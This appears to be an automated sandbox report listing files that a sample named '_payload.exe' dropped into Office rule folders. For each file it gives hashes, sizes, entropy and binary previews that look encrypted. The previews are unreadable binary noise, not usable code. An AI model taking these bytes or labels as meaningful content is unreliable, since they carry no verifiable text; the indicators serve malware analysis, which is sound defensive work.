                                                                                                                          Preview:.<?.c.1..L.Tg_.yS.P...5.....nQ.2...J.\..+=..H...mkk.p...1..k.....Q..}.?....S.!.=s.p..B....7w.bG.0.O...jK.}....p......!b...[.g.....^.....m.1..X(q.|w.<..d..S....(m..........o....p.>..;....N.l..npY-.....z._..C.6..(..[z...V..~..0.....nm....>..........b..wm..Y.O..S...p.#.L.}.=B]......._..C.3..J...\$ ...C...Ep..V.o.]%......7H...K*..@TJ.+.=..*.q..z..z...6I}...H.:.C..!....#U..?L.#.h.R.9T....J.2.z8.b.x8.aB.lh. ^...?r..m.9'oZ+......5o....s....H~..".8....:..l... c.].....;.....a.._...(.?..l...:......s....!kj.....nG.*......Bt.....D....)..L>.%.......1aZ. .J...c.1.=s.N..m.V#.....a[.g...}e.|..4..G............7]..^..d..K+.<[!..7.x..sa....P.H..t`.sa$..U../.R.....V...G..>g...^.%9....d.....\P..^.n...rK...5.lw....0m.2L..Ss`).I...9.n..SY..X...xv.V......E.RQ.&.y.[......>./|.a.CH.h.Ue..1..+..S?_W...w.......@.3.!Fs.~......\j.....\.....q.O8..$r#`Ia..f;.@(h..^.`....5.".$...}..r..i.'..m..z..`..N|.B.K......WYl.n.wDS..1.'lP.......!.`..*w...uqS5mS6...)K......?lq.MD.;,.-r....!.q

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule90401v3.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1583
                                                                                                                          Entropy (8bit):7.899646645852139
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:w38pj2UVZ8J5AKvV25sudVuhq7LZ2EEL3bbsoPzPjczmxvTyDJevfM02+bD:w3812P73vcekCq7FyHNPjWy2ovE0LD
                                                                                                                          MD5:680E8F89535A1CED85B5056259139DF9
                                                                                                                          SHA1:0617CC19123707CEEC1EE8395A7B73E8EE82D9D9
                                                                                                                          SHA-256:C5C8065A0E8BA9DBE414137E6CBF93C071A581574D0286A6E5AF7CA5BAF1B307
                                                                                                                          SHA-512:32FAE687984D1FDFD761D509EAFA21AA4ECDAFFD6ABA2EEDA56ECA842FD9F98898D38F34048C291655A9726F34A620C442684B5E80FEF0A3DAFAFEF9CC77AF7F
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlMM...+>...X....0xQ...p.0.I`b?.a.....f1!w............<2c....\?s..>.....D8..Z....@K.y...aW..~;.....,_.E.....u.".f&*h.@..F.;.i.........\Z.......z.g.........`.F.,..-B.B....b..w..#..Gu.....;<*/.....A..D.:.$x.*n1rP....Q..i....68...8.._ZL4y.*.jb.J..!F.....WY%..hZ.;..-u.=.5...&....).+.Q.qkS....)....^..b8..... .90:.hK=. o..###..s>...,..5R.A_|c....o....c.\.l..[....gt..t..L1....~.....y...v....,./......\...v...?.dQ...#,.Z1.L).K....'Yq.% %..$..V6.2.P...g...o?...X.....?.&...|..........E...k.(..\f.N..>.....Z]d.A....S&....c..9....,[Q.M.'..X.5.0..[E.6...~"O...@..e.....OM....W......#...P..zb...0..n....Mf.B`Y....`..t.....Kq=..P.....W.j[.-.p..L&.bM.2.2...S.'......,....];..S[g.}.._l....Y....M..jTr..7.L%$....c.k... V8....9).!^/J......=+....5.p.......^V.?"..r.ma.........Q..........GI.}.)s.....Q..e..J4QMy.F..7/.......O...6..q.SR.....Z.5..6r....-....D...T5*..{Z..3.z...2....s..(..l.~....@4v..&u...P..^R..Z.t..}......]N..j...(..9.cA.X..B."p.|.}.Eu.\../HI.2_^.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):361051
                                                                                                                          Entropy (8bit):6.513985135289755
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:jhXOuxFnhihhkoc/sCmcZYWmVYgQXK+uQn5478+VVttfAXXkHE:DWxXWmVNQaVQ1+VVttfDE
                                                                                                                          MD5:DA561F32E01A8F29FD9EFC850EC53015
                                                                                                                          SHA1:170FF900ECAC034CA817F8B3A25B396C1CAEF54E
                                                                                                                          SHA-256:9A9D984E34A14372866022E8C72D86E95B67FC41899DD8C031D9598DE2F0D4DA
                                                                                                                          SHA-512:69F1FC7CEFA7D90EB4BFF6BD337B1F21695440354259AC29C44D1088CBDA19F5BC77B0D66EB071230A5F55F1839FCE87E5A5DEC857C6757399EBAB164CFF8C92
                                                                                                                          Malicious:false
                                                                                                                          Preview:<Rule..S.......n......&.7T`y:..k^P.ES!..TC...2bl.C.%...<@...I.F'...x.i~..;'.R.?N.).o..B....)gb.`.U...... Q....J.....v..C.Z.u....(g...:....]8...Kl.H..9.k........d."S..X.C.."...V(..E...F........F..xL..e.D.....B..CWgK.>t-R.(.=...ue.E...lM..O .w.0..?..Wc....J#..-....4.)...ws..Um...l....Q.WQ..F...vG..Xk......A]..Cj..P.A.........Z.3.1..H......0.=..:..OW...T..[&F.F......:..........8.w.%......%...w.^Y/.d.....U.}.@.N4.>68zw...%,...Tw1.v`..*CZb.p<....{+.qV.....VW.`.Z."16....y.?...O.o..y6.../F_........R4....^.. l..B./......6.....'Gh.4.R.y._.Y.......J.%F.9..k.A...6.....j.G[<....,C........16...e......m\k..EY..%......[#....:.,|.9..G\.}<.].......9.y..........h.....u[.;I..(.d...pQ...q.\.D..\;.n@....`&%..C.BC...~.Gr.....K.s.v...l-.xd...\Mr.t..4.0..0....w.Y..n.Bg%._uW_t.i3D0L......Q......c..\f......n..\p.D.Y./.G....}.1h.h|.[..o.B8w'R.X..,.n..C....T$7........H6F.X.....7.R.D).n..N.M#.)?E..C.......N...P2..Y.NY....E..k.....m|.%..L..z..{T.(Y`..[......./...n.6...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule1000v5.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1928
                                                                                                                          Entropy (8bit):7.886208674294104
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:AzZ2TTyvEdgROwEx/OcRsy0gr7YOtTnMSSP3cvlE5j04joejCg5RuUVeCY3XH3RX:Av7qL3XMScsdEV04iYeHH3RBIzwFD
                                                                                                                          MD5:EE826C0AC612E78244085DFF9650DA44
                                                                                                                          SHA1:54E0D9254F735898DDE9CCA04FE41E458BEB5BB6
                                                                                                                          SHA-256:5EA7C2EF73270C9DE71FCD0389E90F71032036892B2B706283F4CE40A68BCE47
                                                                                                                          SHA-512:7D607F303C87192A2F987B2B623A70D6B5610945115873C83BADDF1AF47440ED899F20631B12EA484F326FF4C1BB819722952C1D42185090D6F7EB119779D10A
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml=......Z;..SQ..V.\....1.g...."...m}.<.@3.4..=.E.....T..a.n}...)\U....G.2..62...,cj.?.v....m......d,.'.p..E.(R..zt..**[%.FQ-.S.[...<.}..h....+.\7xl{..Pk%|.......+.~...RS..5.K....#HD..W,M...$.s8A.dtxK.nEL.9=.y.Z.U..l..~y.. .k....`..C.|..-2..^96.`.1V.......1...&.E.w..Kc.'....0.g.P...|.E....,...n...(.....$..8....f...!)...v...x.h".'..Je\.6.u_&...K.#.1.d...].._..=....j`........[.w...!.7.. jm.b.'...nT`^c.7.F...5.D..s..^.}..."WK..`b.gn..2S'..w....2..$...g..s.a<...:.4Y`...hs.....K.r`.I.p.mh3..yC.f...x.3.W.D...>F.......`.m..&r.n4.-Eu9...5.a3...R....0.sV8.7....#.@,-.sF...y_.A`^D..&.n...Z..........;.:dWF..D...[.2.+5.q...{...+Kn..f.54|,....\.h6.d.ZM.:...r.n..+A........v.P!....M.....|.............2.Z.0.Q..OT:..l.v....Z.3...&2......cQG..M|s.....,.@....e.'.E...5.x.X.w..@.7.m..@..G..G..%fc.v.tl..=.......r.J.-...C......QT.[P....y........A...l....M`.n....k."$..`'.O....u..[XFC..0.;..K.$..........z..r.....9.&....q...}..08.|.E!I.z.....Q.;:..]...s..e'|We...I

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10450v3.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1387
                                                                                                                          Entropy (8bit):7.860952559244405
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:4C73mU3/BdKhUl4Eq/x3iyl7EJUINDYU99PHkfVZSu1ic7VdKqMgUvWbD:3x6huVYMNDRLkz1h7VJVsED
                                                                                                                          MD5:843636047DAC255DF0A9D0B8E80690AC
                                                                                                                          SHA1:02E3F75A5BF36D2F1D54EC4517567B0DD99BF39B
                                                                                                                          SHA-256:058B23A3153A1A8A8F35E3554AEF41CE9B104033717BC5372BC13EB8EAC22B8B
                                                                                                                          SHA-512:AE00CFDFCE7A6CA75341E7ACBFB19528E32ADD019E2C3A8CB51E3E5A46C60FA0272A907671AD195C89D41A9F0D2146EF7512A605835880BEA2EB68AF1542129D
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...oQR....#..'i@l#.r...0..;.8.r.3..U......q..?._..Je.....4..0._....$.F...o.B3...s..B)..c"8..Cog5t.=f?o[..XS.se..L.....g.+.....G.../@...X....b...|.+..O,.m.8..7..0]ec%k..9.Q..d.X..L....x%.]...p.FF..Y..fI.u.r...R...D..&u..&....P.........r.6fH...XB<..R....A.....3.m..c..].."..6z..u.<..........r..C.sX.W....b....wq..C4......{...GT...R..5WP.V..CP....>sG.{.%...!..|.J.h8....X\..2..A.........Q../Q\$n.`.H'...../..y*....t................l.e..`u.xv......#..k[.\.s..07.iA.."..:.).p.*...?.....)Z..|<.x......7).C...e..O..^...V..N..A^.7!.Z....3`.a#..P.,..=.......t..\...(68.h.......9...o2..%>..B....f..n.....Y..k.N...-3.1.)i..\.'.~.Lv..w...E1t'..q.5../.^E..`.=E.ob..J..X.T.V.hZ**...EH.0..Ul..D..6..`..1y..xO.OV../....:..@.......d......)......'.]...@....\..".R...6B.)W+^.+.[j.^1..=U..".6-v.'.M...5.O..c+...Ggz<^ho....`....#N..jD..g....7I..........H.R!.....C.5...|p..Y.. .N..Z.K....U.C........y~..../.....}.L..E.q!...}..K.%..A....(.i.I+.~,t.......M...g.2.Y.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10625v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3024
                                                                                                                          Entropy (8bit):7.944428503917552
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:KDPNtJfBdgtESd2E4H9unEi1ZUt1X2HF+qCc0pee5u8Nnrrvn8LfIBJTp8D:KPNtJfBEEVZQfZYM+r1d5n8LfIB34
                                                                                                                          MD5:27607BD1FE6BF2BEF3EF28BEAA06C459
                                                                                                                          SHA1:FAE8C2E8FD947296AA320E63DCD75E3A61F37155
                                                                                                                          SHA-256:4D4849C3F2C7550F96BF96EAEC7CF061E8EE3B775F3F724090E910064B95BFB4
                                                                                                                          SHA-512:67F34012FCC641D89FA4FBC7788266168674C0FDBB29C31E490DA6D203D17DA4D7FF603FBCD89760B505A8E2612AFC728A871D39CC006EE872ACFBE8E15D28F6
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlaL.y.<zm..jU.Fd...4..........Vjt.......AT,:p!N.0....6f..I....6k.K.X5.i..Tj.I..........'......R...l...#../...q....t..3..feg(..V......J.......\G.F..Q_..pbvy....wNY..@..5:..Y..i..`.9%G....`Q ...J...i.x|...Xa.G,-'.'....!.5Q.+`.N%.Cs.N.Q.V.%.k..70....$...j.....ea.d.D./..}?..W.u.....y...f.\.tS3DH_.O..`.FQ.mW..r..,.......j..O.x8.3.xv/.!5..R......=....X.........?E{.%.w..f.h_..m>.% .3....T.}.N......\.v.Y.i.....9....0..+3Qeo.....w;g...\..,>n...+P.c\.#1`.uQa.....GsI2aWB...P....Up...f..........0.f..3.%T.....M....OV .O..5.Y;..&..M)*Z....5..9K.M.1..u..?YhM.*.7....p... .`..2..f........Y&.nC+S.V..`..(...b....f...^....v......".'.Z;A."$.....?8e.2...u.J.....Lw.[kK....mx.W.....@.Dr..rX....9i?d]9<.B..[.)..rS~U..#c..1.].e.x....FY....B.R.`.[..-...;.^......K...Lr3../............K..&2...Q"..._.b........I.d...0.p....n..f..*...h.-.....A...8u.&..`..i.H..({E.5.."..J..Y.{...._.Et...=...^...>}z.p..U.... ........m....).I$b.bJ..I2.@...:.!Y]....d$<....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10626v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1675
                                                                                                                          Entropy (8bit):7.882203086336386
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:d9c2/chzRT20OKi1MjbrIqR0HQAOscAhNyD6SHckw30S+yj02xKd7If+NbD:d9rgzs0OKi1M350HXgASX4g2w0f+tD
                                                                                                                          MD5:D8FFA9474BE16E27A88F1A88777DB5CD
                                                                                                                          SHA1:E8D9C1C8B0C0FF519A3A619BD0964743952BB7D2
                                                                                                                          SHA-256:F341588B455FA955A4A7666C1316AA8080680868FB56AAB2A401400224814F61
                                                                                                                          SHA-512:2F61E411B2559D7C5EA0EC6E48ECB9F2D0F790A7D3D174C14DEB7A655138EA491A9F308DDF4887315029B2329053C837875A50F6C7E19CFB0F42CEA8D309955A
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlQ-.P...u..a/0.(.QgJ..Q./.k.....}..}..L...sS..)..W...A..A.N.'h..p..t#qF.i..a.)..]E...M..h.^..Yc...8.Qg...sc*@.9.z..10. .......r.....@~.........."2ZDJ[..V.x.T.tl|gz..._.4W...Y.._....0.....a....H..u/.z..mR1...+..$K9..1.U..o........r.....Ck......$.....NY...iH{....6UV.j&....OP/E...5j..q/ ..W....[=m..Q......'..Cs.c...:.,..i...........D5.....B.|s.D..:.,].U..v...h.D6..|#...~P._.aa.$.4Q(6.W..4..R...g..ME...../Y..x.!GI.e.y...o.lO.4..M..I...z..Jg...~WO#l..>.j.4z..+....}....$.Y."....2.XW.v..........Oc.6P9.9.........Q(nz.+..2.T.~.Bmg^..-... .i.4..Gs,....$..HMj.b.a..Y./gqv..B......a....cw{'n."..DP..n.....[q.....Wk.....%.T...,..Rr.`......Dj{..J.....I....`..q..O}.@......P.@^?.n'.~T~.3O.Ph.....-"..k..3...4...X..)m?.5......?..c......m..V.)F&...W.1i|K.8J.S.H.Y..c....zz.{...i./x..'KB.s.....e.t....*...n..2..9/g........Dy.4x...@..V..h<.d..T..F.:..7.z.GS...8.....V.4..K........c..W....:.o.K....<..\.c....L#[.}...~.C.PTj>W...W......Ax._.....%.B.\.2....^..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10627v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2113
                                                                                                                          Entropy (8bit):7.886144300620367
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:E4z/cJO58X9+zb/u7p9/TfofdOa4B5AuMNl0gEBJ7Y6A6P3wD:E4Mk8XAWp9bWdOrrENDEf7l3s
                                                                                                                          MD5:4143EA90018C0A57429B2A72B67B1E70
                                                                                                                          SHA1:AA4FB1A366B07033FA6D405F9A08374EA0D6B1F8
                                                                                                                          SHA-256:B8601B15AE493C5EDBA0D5AFF311FD93374CCB6C6A4BDBEE1DF38A46D20597AA
                                                                                                                          SHA-512:BF907304681711A993EE075EAB45B150F063EFAB19750488F9475CDBAF61C8BCDF4ECBA1F879F482C203085ED05D22A94DBB01B8C13E0329A26C13C7B2497A22
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..*..}...Bh.....*iw....O.}.....<.....D.,.-B.2].<.Q....9.%..cf........_..#.....I.:...B...v=.~7...[.E..vF&pu.r...J.....sr7..f.x.jS.NV..1}.A.T.r.p\o.cc..l..l.{..G.J..;L.&..m.sD.H...:......!.,q.Y>-..5.qE.c.^8...gLM.q.1.bi.....vR.c~.E.J.,....p..GL.iIq..d.S..b.luu....\7.%..Q..X...$Jn.........}.D.D..K..I..`8(..>.U.9m.S3...b.:..2Y[..#..yl.;...'.*.M.h|..........@...[(...O..!...9"d.w......X.....d..)|...O*.R.-.<....../"bv{.y...."......|....~W.T}.....T4..Y!.\W..I)K..|O..*S....?.p{A..I..z.....M.<.(b9z....X.A.n.i.=.}.]p..F...#..i....O^.0...Z2.c.._....H.9../.Er.....ex.|...3..H2..bsO%C#..!f.|.5x..9....d....H....t......cK(....z......I....G.O....u.:tBk...<..GT..@..*i.........K>...e........u@..w4J......d.`......D#.$+..!v@lwZ.}._wi..u.*H......8.U......>.e...&.[...R...h.H.e.:..w..V_.=..........h..7..iYC....Hm.u......>..o|n1..?.=....q.Y.....(":.....^......2...kn.0.....[v....p3..d..N$.Y?...H.......#z..5..k...u....i..7F1.oe.<.....H....9....B!l.^..A..G........

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10781v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):813
                                                                                                                          Entropy (8bit):7.742968973838251
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:9rO8nP9ik7x055LHeuwSwcHdGzM3HF1CJQSvhRbD:1P9ik7luw9cHMzvHD
                                                                                                                          MD5:B133179A40101BADF2AFA22CCFFE34A5
                                                                                                                          SHA1:828C0B56FE81CCE4D304FA3EC4BA280484E3320C
                                                                                                                          SHA-256:3FD7EF2E9D7FFAB141D32F514442CDF03676825A69C4BA1B3EEBF1778B693511
                                                                                                                          SHA-512:CD8ED2E749AD54BA68390AE7379E948F1E83672362CAD10B8561BD09A4BA8701B57133113EF60C52E009874F3F5454172A9FFD18B0B5B3E3438B0AF64D3EB289
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.......c...a.g.,Z^9V5mN.R.g.;..f_..[.........:.5....i..V..I'n.r..\3^.yrJ.:..hcO/.b.?.~..R.(AJ...K.*.L.>a.1..R..O...g.H..S....."..p.t..)...H...`.....-.'.....O.$...[........w.y2f}m.8.{1.......W..+"J..W.?j....93..x....+..(.u.......7u5x=.R4`..o/.u..a$..zm"..O..pbq.w.r....wr.c....^.v-..3...g.G........l..40......C.s^.n..;.f6.gT_..,. ..sL.afy.T..u..yN.Rn..q_...~oSoXT...N...'w..h..8=A...f..s...4.rI..K.&f.{!e!#.c.)'....X...y.;&U.....oT_......:....H..h+..G.U..-.}#....[...8%.n...$#..k.9<..~.uG..i..39...;.{k.Z"...;.e......V.h.....`.....Z.v....w..%lt..(.N(maJ.. .0fD.%......./.pQ]Xhx.Q...x\..."..p._..Rj.......6$..._.....D.........t}...$..@...A.B.7.....a....{.....*....A..{^.....1..xE..A...aphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10784v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2070
                                                                                                                          Entropy (8bit):7.898161985497581
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:px4nBMCDM/ehyDKKnZp1/1W8yRVlEFiPsWlvowrdr5KtD:v4GCgUwKKnp1zYP6csWllBr5KV
                                                                                                                          MD5:4673EE4E76EE24973B6EE2D0B2B5468D
                                                                                                                          SHA1:4629AAC9F9B4CAF6974ACEC1B3A00D9A0FD72433
                                                                                                                          SHA-256:62498807EE349A609A66AC82EA8B6CD9329B494F26DC794E97D71041C45C4F36
                                                                                                                          SHA-512:F6B4D4B59DBF318261F5CCD6C2A7C72DCC7F21961586758FCA30DB9B3CEFE425E79B8EBFF2D71E83D131CB5717CF8D9D9BDB702DE9030524D9A642A732E44AC3
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.....O.D .....\.T.:aU.Z..im.i...!...c.O?.#...8...+.......`.rZ..1.A..;.l.`......O.C.R.m}C..G1.z.....NC...()5........{..g...>x....!.-...S..4.in....*..+kR!..n..S..}e.NHr.........*...P.Be....8.<C....Wq#~...t..AL.9...e......:..._.gK..v.6(x.t...\.9Ie......:.....\.=......3........*...9Fd;....{.'..e....v<.......B...6+8..=`'.9J..ao.......DBy.?r. .J5W.,`.>.E..h.E..&..Ao.&..wVt...D..s..&...O. x..*0.F.3......?.......n!.}..+..$:n......K>P....!i.I...e..b_...C.s.S....YK-.\....j9.Vz{Y>2..Z4F|....dG.$..b....B.Ti80Y5=...d1...3.\.O%O.......8..Gjp....;...Yw.=....%`....$4.Rs...A..."..o.....ZE.;.....X..Cr..1H.s.+.].ssR2.3....4.B2...|...:...`.........d..^.).+H....~..[...zN!.+....6W..$2?.....:Cq.....e..}s/f..p.1].a}..8..@...J\nF....N.N0@..X.s.-.tl.Y..-eN...i2N..G....#t.Gbm.....]..g.h.C...z$R....d.XU..`.B.[..S.y..L...[X;...g^..L`..U?.?.[$.y..^....H[.W.......c.^../..%.R...VZ.U.>..B.E.X.?........ ).VX.)7..M .e....m$lc"T.m..M.{..fq4V..l8........l.......

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10800v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):789
                                                                                                                          Entropy (8bit):7.714591360278976
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:QbtMwWLA6CGS3gjsUpfpuQhB9CgReBjz8xbD:Qhtj6C6sMhTPw98hD
                                                                                                                          MD5:021FC05EE9BA572E3308C529308531E3
                                                                                                                          SHA1:11D92D5C206F96738364C5EF7CE655DA9C8CEFBF
                                                                                                                          SHA-256:D0FEBD7C25C140D4BEEA7860BED18E2B0329CA24E6F096937640272659AFB1C1
                                                                                                                          SHA-512:42219AC17202BA2C3E53E51334A088C1FA895C70DECD04D360955985DF5C28898BCCF3049347BF3A47882D24B29677A05AC61AF2D7A5FE5A07A073F119557E59
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml->.E@..C.SN.. ....{...E....M..|e.;;.J.z.85..D.?X.....j..Ci"._.)^C.p0...........E`.8...H...y...3{SP...5..I...\...z..{yL.U+..p(D.>.....u'&....$......{..Y..A.q...T...../.....L...:.m......Y=...+Sw9.0.3...yC....].....dRq..@g.x...Nk...=..G.:.'.=.M.;....;.!..t0]...H...9.0...;..W!.w.}...#......;.......I<..:c.C.........+.>;.maz4.?..)53.)b...Z....s...J..Oo.$3h ....&..Dw....B.eOg......4...@<w.%...I..7.?..z...{.l....Ik=JX.....].K"yc.&*M..O...#v.i!j......Q...V1...q....2...-Gc.=Q .........(.nPl..g..sX.p..+h.5.B..&e....A.. .{&..g^.C...8.7....>..DN+d/oD.i.oe..[....}.a..".....kX...v.r...#..G7..?.E`...Q=OSi..m+O.Z....r<).....v3....g...L.o....E..F.E(..UL....R.....4.V.zrh.`..:.z.w...phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10801v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3017
                                                                                                                          Entropy (8bit):7.928849250538861
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:VM/9asf7EHvtzqkv8eFRj1eME55OFHBcdnZ1K+QCxHdVavT96AzCpjQNO6RqwHrj:Kasfu3FZE55OHqZt5A6XpEy8rdF
                                                                                                                          MD5:5CE454F935AFA484607C942A9ECE7AF2
                                                                                                                          SHA1:716ED2FAA672AB1C30DB85EBE90C276A40FA6DFC
                                                                                                                          SHA-256:F6E74AB8852F9C740D4FEA456F3AC2FCDEE8211E827B7B65D0155382A17F56E7
                                                                                                                          SHA-512:231E3C10FE5D752D5111789E47A4B4DCCC5A2E485ED62556D56D3B94E9C87A97A1477FCB848CCC1CD1AFAD493EDA245A33FEBFAE8054C4ACF879E2BB5393F268
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.....t.`....Z0a...I..O..r$..?.....{mG`&h...E..+.r.X.&.E._......dCT..8."m..^<.......>.)..................2L..1#.D...../U-I\.~vkZ.....N-..e*._.../n...s~.Z.......H....J.%x..:J..|......J..(_..........f"..|....N..Wp.b..By%.ZZ...u..u!h5._..-Q.W......|=.L....*.....P..m.....)].....n. Il.."..pQ....4....|.u.k.......68........5..........g...3~\.....^.A..`..8...=E`..P..sU,;.%+.KC..Q.V.s.9...{...%Z.^.K.wK.!q.]...?.^....A.........wv.B,..C<..fmQ..(8d..pb..$.....N8..s...@X4wv...L.:{......O...[..w.P%1.$....&..)....m..K.M.xz2l4..J.X..8M.c.E..=3..%T.x:..][......N.s~...*...\%..0...w}p.....~U..F..K.......b8......zH.@?.'.v.E..c..U.b4.b.....n.!..f+F.i.GN\w..Tv...........x..;(..{.o..l..$J../+#.q....1U3...)o.1^....s.;.5....">!-erYx4..'a..e...X..P2....x....D..D......g......-0...$.....^Sr.$R~...I`iX0...y.?....ABS&t../R..].....H..'..X.......eh./..:Yg.H-~.r...K.:..I..>+.."8..O......F ..O...`.}..*..Y...=.........1..Q.....!8......SA...J.r..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10802v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3017
                                                                                                                          Entropy (8bit):7.936682350786673
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:DtmCitZl6fMRljIVSbKhy5HkZ36YhkslcYD0IOltquGe96cEJge2o/RS6Bv0NpZ1:QCi6EHIVSb9JYfhZlXst5/67JgedZS6U
                                                                                                                          MD5:3309CAD7368BA0997943D5FD6ADA8B87
                                                                                                                          SHA1:D8A8871346814CB15E4952BD2B0EE96BC9610DC4
                                                                                                                          SHA-256:C74A187E46B34F1A5B12E3D1BC340E001A96FF7DFB3640892BF138DBA8905491
                                                                                                                          SHA-512:9BAC12628548B462632B56A31B5E40A7CCDA833FD4DCC14BD535FBB926D63AF5F9E35EA64F8D9BA9F330DD713E432A2A66E19A250D3022D813FAAD49D6B9D4C8
                                                                                                                          Malicious:false
